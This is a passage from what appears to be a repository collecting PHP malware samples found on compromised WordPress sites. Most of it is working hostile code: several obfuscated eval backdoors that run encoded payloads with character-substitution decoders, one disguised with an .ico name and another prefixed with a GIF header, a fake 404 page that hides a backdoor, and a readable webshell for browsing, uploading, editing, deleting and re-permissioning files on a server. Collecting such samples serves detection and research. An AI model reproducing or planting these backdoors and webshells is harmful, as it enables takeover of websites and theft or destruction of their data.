$vjozofh); 19 | } 20 | function fwixisz($inzbmds, $fpkofng) { 21 | return @$inzbmds[9]($inzbmds[0], $fpkofng); 22 | } 23 | function lfbsd($inzbmds, $fpkofng) { 24 | $hvgkefx = $inzbmds[3]($fpkofng) % 3; 25 | if (!$hvgkefx) { 26 | eval($fpkofng[1]($fpkofng[2])); 27 | exit(); 28 | } 29 | } 30 | $azxre = fwixisz($inzbmds, $azxre); 31 | lfbsd($inzbmds, $inzbmds[5]($inzbmds[1], $azxre ^ beanjw($inzbmds, $mgvsei, $inzbmds[8]($azxre)))); 32 | } ?> -------------------------------------------------------------------------------- /found_on_wordpress/mai.php: -------------------------------------------------------------------------------- 1 | 3 | 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 4 | -------------------------------------------------------------------------------- /found_on_wordpress/mildnet.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattiasgeniar/php-exploit-scripts/a6ab857232e15866aab2e37338941fb2e19e60f5/found_on_wordpress/mildnet.php -------------------------------------------------------------------------------- /found_on_wordpress/moyudazh.php: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | 'P', '0' => 'Q', '3' => 'W', '2' => 'e', '5' => 'd', '4' => '8', '7' => 'n', '6' => 'Z', '9' => 'U', '8' => 'N', 'A' => 'R', 'C' => 'X', 'B' => 's', 'E' => 'D', 'D' => 'A', 'G' => '4', 'F' => 'B', 'I' => 'O', 'H' => 'q', 'K' => 'z', 'J' => 't', 'M' => 'V', 'L' => '0', 'O' => 'S', 'N' => 'h', 'Q' => 'H', 'P' => 'F', 'S' => 'c', 'R' => 'E', 'U' => 'l', 'T' => 'G', 'W' => 'm', 'V' => 'g', 'Y' => 'K', 'X' => 'i', 'Z' => 'Y', 'a' => '9', 'c' => 'w', 'b' => 'T', 'e' => 'u', 'd' => 'x', 'g' => '7', 'f' => 'I', 'i' => 'L', 'h' => '6', 'k' => 'b', 'j' => 'y', 'm' => 'v', 'l' => '5', 'o' => 'k', 'n' => 'M', 'q' => 'C', 'p' => '3', 's' => 'p', 'r' => 'a', 'u' => 'J', 't' => 'j', 'w' => '1', 'v' => 'r', 'y' => 'f', 'x' => 'o', 'z' => '2'); 15 | eval 16 | /*lglmb*/ 17 | (bkkbhgsl($rramrnnyf, $gbltknoanv)); ?> -------------------------------------------------------------------------------- /found_on_wordpress/nes.php: -------------------------------------------------------------------------------- 1 | 404 Not Found

    Not Found

    The requested URL '.$_SERVER['PHP_SELF'].' was not found on this server

    Additionally, a 404 Not Found error was encountered while trying to use an Error Document to handle the request

    ';die();exit(); 18 | } 19 | ?> -------------------------------------------------------------------------------- /found_on_wordpress/nstview.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattiasgeniar/php-exploit-scripts/a6ab857232e15866aab2e37338941fb2e19e60f5/found_on_wordpress/nstview.php -------------------------------------------------------------------------------- /found_on_wordpress/phpd.local.php: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/mattiasgeniar/php-exploit-scripts/a6ab857232e15866aab2e37338941fb2e19e60f5/found_on_wordpress/phpd.local.php -------------------------------------------------------------------------------- /found_on_wordpress/response41.php: -------------------------------------------------------------------------------- 1 | "C", "C"=>"8", "B"=>"5", "E"=>"E", "D"=>"3", "F"=>"6", "1"=>"4", "0"=>"D", "3"=>"A", "2"=>"9", "5"=>"1", "4"=>"2", "7"=>"B", "6"=>"0", "9"=>"7", "8"=>"F");$rmejfk = "AgokZGVmYXVsd82hYDRpb41gPS3nQ6MnOwoKQGluaV2zZXQoJ4Vycm2yX4xvZycsTlVMTAk9Ak7pbm"."lfc4V6KAdsb4dfZXJybDJzJywwKTsKQGluaV2zZXQoJ45he82leGVjdXRpb4Bf"."dGltZScsMAk9Ak7zZXRfdGltZV2saW5pdAgwKTsKQHNld82tYWdpY52xdW26ZXNfcnVudGltZSgwKT"."sKQGRlZmluZSgnV5NPX5Z8UlNJT61nLA3nMi15LjInKTsKAmlmKGdld82tYWdpY52xdW26ZXNfZD7jKAkpIHsKIA3gIG"."Z5bmN6aW2uI8dTTDN6cmlwc4xhc4hlcygkYXJyYXkpIHsKIA3gIA3gIA7yZXR5cm1gaXNfY"."XJyYXkoJG8ycm8BKS3/IG8ycm8BX45hcAgnV5NPcDRyaX7zbG8zaGVzJywgJG8ycm8BKS3FIHN6cmlwc4xhc4hlcygkYXJ"."yYXkpOwogIA3gfQogIA3gJ82QT5NUI06gV5NPcDRyaX7zbG8zaGVzKARfUE2TVAk9Ai3gIA3kX6NPT6tJRS32I8dTTDN6cmlwc4"."xhc4hlcygkX6NPT6tJRSk9An6KAmZ5bmN6aW2uIHdzb6xvZ4luKAkgewogIA3gaGVhZGVyKAdIV8RQLzEuMA36M0QgTm2"."6IEZvdWBkJyk9Ai3gIA7kaWUoIjQwNAIpOwp2AgpmdWBjdGlvbi7XU62zZXRjb42ra"."WUoJGssIAR4KS79Ai3gIA3kX6NPT6tJRVska56gPS3kdjsKIA3gIHNldGNvb4tpZSgkaywgJHYpOwp2A"."gppZighZW5wdHkoJG85dGhfcG8zcykpIHsKIA3gIGlmKGlzc4V6KARfUE2TV8sncG8zcyd"."dKS3mJi3obWQ5KARfUE2TV8sncG8zcyddKS32PS3kYXV6a82wYX"."NzKSkKIA3gIA3gIA7XU62zZXRjb42raWUobWQ5KARfU6VSVkVSWydIV8RQX6hPU5QnXSksIARhdXRoXD7hcDMpOwoKIA"."3gIGlmIAghaXNzZXQoJ820T62LSUVbbWQ5KARfU6VSVkVSWydIV8RQX6hPU5QnXSldKS7CfA3"."oJ820T62LSUVbbWQ5KARfU6VSVkVSWydIV8RQX6hPU5QnXSldIAE2IARhdX"."RoXD7hcDMpKQogIA3gIA3gIHdzb6xvZ4luKAk9An6KAmZ5bmN6aW2uIG8jdGlvblIoKS79Ai3gIA7pZighQARfUE2TV8snZ"."XYnXSkgewogIA3gIA3gIARhI06gYXJyYXkoAi3gIA3gIA3gIA3gIAJ5bm8tZSIgPT1gcGhwXDV"."uYW5lKAksAi3gIA3gIA3gIA3gIAJwaH7fdmVyc4lvbiIgPT1gcGhwdmVyc4lvbigpL3ogIA3gIA3gIA3gIA3"."idDNvXDZlcnNpb41iI06+I8dTT52WRVJTSU2OL3ogIA3gIA3gIA3gIA3ic48mZW5vZGUiI06+IE7pbmlfZ4V6KAdz"."YWZlX45vZGUnKQogIA3gIA3gIAk9Ai3gIA3gIA3gZWNoby7zZXJpYWxpemUoJGEpOwogIA3gfS7lbHNlIHsKIA3gIA3gIA"."7ldm8sKARfUE2TV8snZXYnXSk9Ai3gIA72An6KAmlmKA7lbX76eS"."gkX57PU5RbJ4MnXSkgKQogIA3gaWYoaXNzZXQoJGRlZm85bHRfYWN6aW2uKS3mJ"."i7mdWBjdGlvbl2leGlzdHMoJ48jdGlvbicgLi3kZGVmYXVsd82hYDRpb41pKQo"."gIA3gIA3gIARfUE2TV8snYyddI06gJGRlZm85bHRfYWN6aW2uOwogIA3gZWxzZQogIA3gIA3gIARfUE2TV8snYyddI06gJ5"."NlY6luZmCnOwppZiggIWVtcHRBKARfUE2TV8snYyddKS3mJi7mdWBjdGlvbl2le"."GlzdHMoJ48jdGlvbicgLi3kX57PU5RbJ4MnXSkgKQogIA3gY48sb825c4VyX4Z5bmMoJ48jd"."GlvbicgLi3kX57PU5RbJ4MnXSk9AmV1aXQ9";eval/*ugt*/(hxhsphl($rmejfk, $axidkzk));?> -------------------------------------------------------------------------------- /found_on_wordpress/script.php: -------------------------------------------------------------------------------- 1 | 33 | -------------------------------------------------------------------------------- /found_on_wordpress/ssl.php: -------------------------------------------------------------------------------- 1 | "7", "C"=>"4", "B"=>"A", "E"=>"9", "D"=>"3", "F"=>"B", "1"=>"6", "0"=>"5", "3"=>"C", "2"=>"1", "5"=>"D", "4"=>"F", "7"=>"0", "6"=>"8", "9"=>"E", "8"=>"2");$aopdsjreec = "3gokZGVmYXVsd4EhYDRpb8CgPSBnQ7MnOwoKQGluaVEzZXQoJ8VycmEyX8xvZycsTlVMT3kA3kFpb"."mlfc8V7K3dsb8dfZXJybDJzJywwKTsKQGluaVEzZXQoJ82he4EleGVjdXRpb80fdGltZScsM3kA3kFzZXRfdGltZVEsaW2pd3"."gwKTsKQHNld4EtYWdpY2ExdWE7ZXNfcnVudGltZSgwKTsKQGRlZmluZSgnV2NPX2Z4UlNJT7CnL3BnMiC2LjInKTsK3mlmK"."Gdld4EtYWdpY2ExdWE7ZXNfZDFjK3kpIHsKI3BgIGZ2bmN7aWEuI4dTTD"."N7cmlwc8xhc8hlcygkYXJyYXkpIHsKI3BgI3BgI3FyZXR2cmCgaXNfYXJyYXkoJG4ycm"."40KSB/IG4ycm40X82hc3gnV2NPcDRyaXFzbG4zaGVzJywgJG4ycm40KSB1IHN7cmlwc8xhc8h"."lcygkYXJyYXkpOwogI3BgfQogI3BgJ4EQT2NUI57gV2NPcDRyaXFzbG4zaGVzK3RfU9ETV3kA3iBgI3BkX7NPT7t"."JRSBEI4dTTDN7cmlwc8xhc8hlcygkX7NPT7tJRSkA3n7K3mZ2bmN7aWEuIHdzb7xvZ8luK3kgewogI3BgaGVhZGVyK3dIV"."4RQLz9uM3B7M5QgTmE7I9ZvdW0kJykA3iBgI3FkaWUoIjQwN3IpOwpE3gpmdW0jdGl"."vbiFXU7EzZXRjb8EraWUoJGssI3R8KSFA3iBgI3BkX7NPT7tJRVska27gPSBkdjsKI3BgIHNldGNvb8"."tpZSgkaywgJHYpOwpE3gppZighZW2wdHkoJG42dGhfcG4zcykpIHsKI"."3BgIGlmKGlzc8V7K3RfU9ETV4sncG4zcyddKSBmJiBobWQ2K3RfU9ETV4sncG4zcyddKSBEP"."SBkYXV7a4EwYXNzKSkKI3BgI3BgI3FXU7EzZXRjb8EraWUobWQ2K3RfU7VSVkVSWydIV4RQX7hPU2QnXSksI3RhdXRoX"."DFhcDMpOwoKI3BgIGlmI3ghaXNzZXQoJ4E5T7ELSUVbbWQ2K3RfU7VSVkVSWydIV4RQX7hPU2QnXSldKSF6f3BoJ4E5T7ELSUVbb"."WQ2K3RfU7VSVkVSWydIV4RQX7hPU2QnXSldI39EI3RhdXRoXDFhcDMpKQogI3BgI3"."BgIHdzb7xvZ8luK3kA3n7K3mZ2bmN7aWEuIG4jdGlvblIoKSFA3iBgI3FpZighQ3RfU9ETV4snZXYnXSkgewogI3BgI3BgI3RhI"."57gYXJyYXko3iBgI3BgI3BgI3BgI3J2bm4tZSIgPTCgcGhwXDVuYW2l"."K3ks3iBgI3BgI3BgI3BgI3JwaHFfdmVyc8lvbiIgPTCgcGhwdmVyc8lv"."bigpLBogI3BgI3BgI3BgI3BidDNvXDZlcnNpb8CiI57+I4dTT2EWRVJTSUEOLBogI3BgI3BgI3BgI"."3Bic84mZW2vZGUiI57+I9FpbmlfZ8V7K3dzYWZlX82vZGUnKQogI3BgI3BgI3kA3iBgI3BgI3BgZWNobyFzZXJpY"."WxpemUoJG9pOwogI3BgfSFlbHNlIHsKI3BgI3BgI3Fldm4sK3RfU9ETV4snZXYnXSkA3iBgI3FE3n7K"."3mlmK3FlbXF7eSgkX2FPU2RbJ8MnXSkgKQogI3BgaWYoaXNzZXQoJGRlZm"."42bHRfYWN7aWEuKSBmJiFmdW0jdGlvblEleGlzdHMoJ84jdGlvbicgLiBkZGVmYXVsd4EhYDRpb8CpKQogI3BgI3Bg"."I3RfU9ETV4snYyddI57gJGRlZm42bHRfYWN7aWEuOwogI3BgZWxzZQogI3BgI3BgI3RfU9ETV4snY"."yddI57gJ2NlY7luZm6nOwppZiggIWVtcHR0K3RfU9ETV4snYyddKSBmJ"."iFmdW0jdGlvblEleGlzdHMoJ84jdGlvbicgLiBkX2FPU2RbJ8MnXSkgKQogI3BgY84sb4E2c8VyX8Z2bmMo"."J84jdGlvbicgLiBkX2FPU2RbJ8MnXSkA3mVCaXQA";eval/*uey*/(rjsnzlie($aopdsjreec, $pcobpovqx));?> -------------------------------------------------------------------------------- /found_on_wordpress/theme_bold_footer.php: -------------------------------------------------------------------------------- 1 | 16 | -------------------------------------------------------------------------------- /found_on_wordpress/wordpress-saved-with-a-dot-ico-extension.php: -------------------------------------------------------------------------------- 1 | 'I', '0'=>'O', '3'=>'e', '2'=>'w', '5'=>'J', '4'=>'l', '7'=>'h', '6'=>'W', '9'=>'G', '8'=>'k', 'A'=>'5', 'C'=>'N', 'B'=>'b', 'E'=>'i', 'D'=>'4', 'G'=>'1', 'F'=>'9', 'I'=>'P', 'H'=>'t', 'K'=>'r', 'J'=>'c', 'M'=>'2', 'L'=>'x', 'O'=>'B', 'N'=>'u', 'Q'=>'R', 'P'=>'K', 'S'=>'H', 'R'=>'C', 'U'=>'E', 'T'=>'g', 'W'=>'v', 'V'=>'F', 'Y'=>'V', 'X'=>'6', 'Z'=>'d', 'a'=>'n', 'c'=>'o', 'b'=>'X', 'e'=>'s', 'd'=>'A', 'g'=>'Y', 'f'=>'z', 'i'=>'j', 'h'=>'p', 'k'=>'0', 'j'=>'T', 'm'=>'3', 'l'=>'8', 'o'=>'Q', 'n'=>'m', 'q'=>'U', 'p'=>'f', 's'=>'y', 'r'=>'S', 'u'=>'q', 't'=>'Z', 'w'=>'M', 'v'=>'L', 'y'=>'a', 'x'=>'7', 'z'=>'D'); 189 | eval/*jcnr*/(qqcsgoosxa($ehhfmblpps, $rjfpul)); 190 | } 191 | -------------------------------------------------------------------------------- /found_on_wordpress/wp-blog.php: -------------------------------------------------------------------------------- 1 | /* Decoded by unphp.net */ 2 | 3 | gif89a 4 | $value) { 11 | $_POST[$key] = stripslashes($value); 12 | } 13 | } 14 | echo ' 15 | 16 | 17 | 18 | Webshell 19 | 57 | 58 | 59 |
    60 | Current Path : '; 61 | if (isset($_GET['path'])) { 62 | $path = $_GET['path']; 63 | } else { 64 | $path = getcwd(); 65 | } 66 | $path = str_replace('\',' / ',$path); 67 | $paths = explode(' / ',$path); 68 | 69 | foreach($paths as $id=>$pat){ 70 | if($pat == '' && $id == 0){ 71 | $a = true; 72 | echo ' < ahref = "?path=/" > / < / a > '; 73 | continue; 74 | } 75 | if($pat == '') continue; 76 | echo ' < ahref = "?path='; 77 | for($i=0;$i<=$id;$i++){ 78 | echo "$paths[$i]"; 79 | if($i != $id) echo " / "; 80 | } 81 | echo '" > '.$pat.' < / a > / '; 82 | } 83 | echo ' < / td > < / tr > < tr > < td > '; 84 | if(isset($_FILES['file'])){ 85 | if(copy($_FILES['file']['tmp_name'],$path.' / '.$_FILES['file']['name'])){ 86 | echo ' < fontcolor = "green" > FileUploadDone . < / font > < br / > '; 87 | }else{ 88 | echo ' < fontcolor = "red" > FileUploadError . < / font > < br / > '; 89 | } 90 | } 91 | echo ' < b > < br > < br > '.php_uname().' < br > < / b > < br > '; 92 | echo ' < formenctype = "multipart/form-data"method = "POST" > UploadFile: < inputtype = "file"name = "file" / > < inputtype = "submit"value = "upload" / > < / form > < / td > < / tr > '; 93 | if(isset($_GET['filesrc'])){ 94 | echo "Current File : "; 95 | echo $_GET['filesrc']; 96 | echo ' < / tr > < / td > < / table > < br / > '; 97 | echo(' < pre > '.htmlspecialchars(file_get_contents($_GET['filesrc'])).' < / pre > '); 98 | }elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ 99 | echo ' < / table > < br / > < center > '.$_POST['path'].' < br / > < br / > '; 100 | if($_POST['opt'] == 'chmod'){ 101 | if(isset($_POST['perm'])){ 102 | if(chmod($_POST['path'],$_POST['perm'])){ 103 | echo ' < fontcolor = "green" > ChangePermissionDone . < / font > < br / > '; 104 | }else{ 105 | echo ' < fontcolor = "red" > ChangePermissionError . < / font > < br / > '; 106 | } 107 | } 108 | echo ' < formmethod = "POST" > Permission: < inputname = "perm"type = "text"size = "4"value = "'.substr(sprintf('%o', fileperms($_POST['path'])), -4).'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "chmod" > < inputtype = "submit"value = "Go" / > < / form > '; 109 | }elseif($_POST['opt'] == 'rename'){ 110 | if(isset($_POST['newname'])){ 111 | if(rename($_POST['path'],$path.' / '.$_POST['newname'])){ 112 | echo ' < fontcolor = "green" > ChangeNameDone . < / font > < br / > '; 113 | }else{ 114 | echo ' < fontcolor = "red" > ChangeNameError . < / font > < br / > '; 115 | } 116 | $_POST['name'] = $_POST['newname']; 117 | } 118 | echo ' < formmethod = "POST" > New Name: < inputname = "newname"type = "text"size = "20"value = "'.$_POST['name'].'" / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "rename" > < inputtype = "submit"value = "Go" / > < / form > '; 119 | }elseif($_POST['opt'] == 'edit'){ 120 | if(isset($_POST['src'])){ 121 | $fp = fopen($_POST['path'],'w'); 122 | if(fwrite($fp,$_POST['src'])){ 123 | echo ' < fontcolor = "green" > EditFileDone . < / font > < br / > '; 124 | }else{ 125 | echo ' < fontcolor = "red" > EditFileError . < / font > < br / > '; 126 | } 127 | fclose($fp); 128 | } 129 | echo ' < formmethod = "POST" > < textareacols = 80rows = 20name = "src" > '.htmlspecialchars(file_get_contents($_POST['path'])).' < / textarea > < br / > < inputtype = "hidden"name = "path"value = "'.$_POST['path'].'" > < inputtype = "hidden"name = "opt"value = "edit" > < inputtype = "submit"value = "Go" / > < / form > '; 130 | } 131 | echo ' < / center > '; 132 | }else{ 133 | echo ' < / table > < br / > < center > '; 134 | if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ 135 | if($_POST['type'] == 'dir'){ 136 | if(rmdir($_POST['path'])){ 137 | echo ' < fontcolor = "green" > DeleteDirDone . < / font > < br / > '; 138 | }else{ 139 | echo ' < fontcolor = "red" > DeleteDirError . < / font > < br / > '; 140 | } 141 | }elseif($_POST['type'] == 'file'){ 142 | if(unlink($_POST['path'])){ 143 | echo ' < fontcolor = "green" > DeleteFileDone . < / font > < br / > '; 144 | }else{ 145 | echo ' < fontcolor = "red" > DeleteFileError . < / font > < br / > '; 146 | } 147 | } 148 | } 149 | echo ' < / center > '; 150 | $scandir = scandir($path); 151 | echo ' < divid = "content" > < tablewidth = "700"border = "0"cellpadding = "3"cellspacing = "1"align = "center" > < trclass = "first" > < td > < center > Name < / center > < / td > < td > < center > Size < / center > < / td > < td > < center > Permissions < / center > < / td > < td > < center > Options < / center > < / td > < / tr > '; 152 | 153 | foreach($scandir as $dir){ 154 | if(!is_dir("$path/$dir") || $dir == ' . ' || $dir == ' . . ') continue; 155 | echo " 156 | $dir 157 |
    --
    158 |
    "; 159 | if(is_writable("$path/$dir")) echo ' < fontcolor = "green" > '; 160 | elseif(!is_readable("$path/$dir")) echo ' < fontcolor = "red" > '; 161 | echo perms("$path/$dir"); 162 | if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ' < / font > '; 163 | 164 | echo "
    165 |
    166 | 172 | 173 | 174 | 175 | \" /> 176 |
    177 | "; 178 | } 179 | echo ' < trclass = "first" > < td > < / td > < td > < / td > < td > < / td > < td > < / td > < / tr > '; 180 | foreach($scandir as $file){ 181 | if(!is_file("$path/$file")) continue; 182 | $size = filesize("$path/$file")/1024; 183 | $size = round($size,3); 184 | if($size >= 1024){ 185 | $size = round($size/1024,2).'MB'; 186 | }else{ 187 | $size = $size.'KB'; 188 | } 189 | 190 | echo " 191 | $file 192 |
    ".$size."
    193 |
    "; 194 | if(is_writable("$path/$file")) echo ' < fontcolor = "green" > '; 195 | elseif(!is_readable("$path/$file")) echo ' < fontcolor = "red" > '; 196 | echo perms("$path/$file"); 197 | if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ' < / font > '; 198 | echo "
    199 |
    200 | 207 | 208 | 209 | 210 | \" /> 211 |
    212 | "; 213 | } 214 | echo ' < / table > < / div > '; 215 | } 216 | echo ' < br / > < / BODY > < / HTML > '; 217 | function perms($file){ 218 | $perms = fileperms($file); 219 | 220 | if (($perms & 0xC000) == 0xC000) { 221 | // Socket 222 | $info = 's'; 223 | } elseif (($perms & 0xA000) == 0xA000) { 224 | // Symbolic Link 225 | $info = 'l'; 226 | } elseif (($perms & 0x8000) == 0x8000) { 227 | // Regular 228 | $info = ' - '; 229 | } elseif (($perms & 0x6000) == 0x6000) { 230 | // Block special 231 | $info = 'b'; 232 | } elseif (($perms & 0x4000) == 0x4000) { 233 | // Directory 234 | $info = 'd'; 235 | } elseif (($perms & 0x2000) == 0x2000) { 236 | // Character special 237 | $info = 'c'; 238 | } elseif (($perms & 0x1000) == 0x1000) { 239 | // FIFO pipe 240 | $info = 'p'; 241 | } else { 242 | // Unknown 243 | $info = 'u'; 244 | } 245 | 246 | // Owner 247 | $info .= (($perms & 0x0100) ? 'r' : ' - '); 248 | $info .= (($perms & 0x0080) ? 'w' : ' - '); 249 | $info .= (($perms & 0x0040) ? 250 | (($perms & 0x0800) ? 's' : 'x' ) : 251 | (($perms & 0x0800) ? 'S' : ' - ')); 252 | 253 | // Group 254 | $info .= (($perms & 0x0020) ? 'r' : ' - '); 255 | $info .= 